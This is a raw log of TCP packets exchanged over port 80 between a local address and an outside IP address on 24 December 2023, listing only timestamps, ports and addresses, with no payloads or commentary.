Dec 24, 2023 10:44:26.741463900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.741516113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.741558075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.741595984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.741616964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.741700888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.741741896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.741779089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.741827965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.741871119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.741897106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.741950035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742000103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742046118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.742069960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742127895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742173910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.742194891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742242098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.742255926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742341995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742383003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.742397070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742522955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742569923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.742594004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742635965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742707968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742752075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.742755890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742822886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742844105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.742866039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.742971897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743011951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743027925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743087053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743133068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743149996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743191957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743215084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743288040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743325949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743379116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743400097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743438005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743493080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743561983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743619919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743669033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743709087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743787050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743829012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743880987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.743918896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.743968964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744045973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744110107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744153023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.744231939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744298935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744344950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.744374990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744415998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.744416952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744481087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744520903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.744540930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744579077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744622946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.744647980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744724989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744786978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744831085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744834900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.744884014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744931936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.744957924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.744997978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745022058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745095015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745136023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745161057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745246887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745296955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745299101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745357990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745421886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745462894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745471001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745542049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745587111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745590925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745623112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745647907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745671988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745714903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745778084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745798111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745841026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.745881081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.745927095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746009111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746052980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746053934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746148109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746192932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746195078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746233940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746257067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746308088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746349096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746371031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746429920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746475935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746494055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746565104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746659040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746706009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746742964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746824980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746869087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746870995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746907949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.746925116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.746985912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747033119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.747072935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747158051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747203112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.747229099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747289896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747364998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747411966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747411966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.747474909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747517109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.747526884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747560024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.747610092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747735977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747767925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747782946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.747817993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.747854948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.747946024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748050928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748094082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.748159885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748205900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748254061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.748262882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748348951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748423100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748465061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.748491049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748544931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748574018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.748610020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748672962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748718023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.748754025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748800039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748846054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.748869896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.748934984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.748939037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749006033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749052048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749070883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749123096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749176979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749186039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749233961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749294043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749340057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749351978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749424934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749469042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749492884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749522924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749538898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749593973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749614000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749639988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749701023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749764919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749809980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749830008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749881029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749927044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.749953985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.749999046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750010967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750086069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750133038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750158072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750220060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750263929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750272989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750344992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750413895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750458956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750474930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750520945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750569105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750600100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750638008 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750668049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750701904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750747919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750777960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750843048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750889063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.750910997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.750953913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751024008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751065016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751092911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751106977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751128912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751176119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751213074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751260996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751332045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751380920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751400948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751483917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751547098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751591921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751606941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751709938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751754045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751777887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751827955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751836061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751929045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.751976967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.751977921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752046108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752094984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.752108097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752170086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752243996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752288103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.752304077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752341032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752393961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.752429962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752444029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752471924 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.752530098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752593040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752650023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752654076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.752736092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752777100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.752815962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752856016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.752880096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752938986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.752984047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753022909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753087997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753127098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753134966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753205061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753246069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753285885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753323078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753371954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753416061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753441095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753484011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753504992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753557920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753598928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753624916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753690958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753734112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753755093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753778934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753815889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.753851891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753901958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.753972054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754014969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754101992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754164934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754209995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754241943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754277945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754290104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754355907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754400969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754415035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754478931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754530907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754535913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754589081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754643917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754687071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754689932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754755974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754801035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754821062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754858017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.754884958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754940033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.754980087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.755014896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755202055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755247116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.755264997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755352020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755399942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755445957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.755455017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755520105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755563974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.755589008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755631924 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.755651951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755719900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755767107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.755774021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755837917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755882978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.755911112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.755989075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.756089926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.756134987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.756136894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.756210089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.756253958 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.756269932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.756305933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:26.756330013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.756393909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:26.756438017 CET	49716	80	192.168.2.5	91.215.85.17
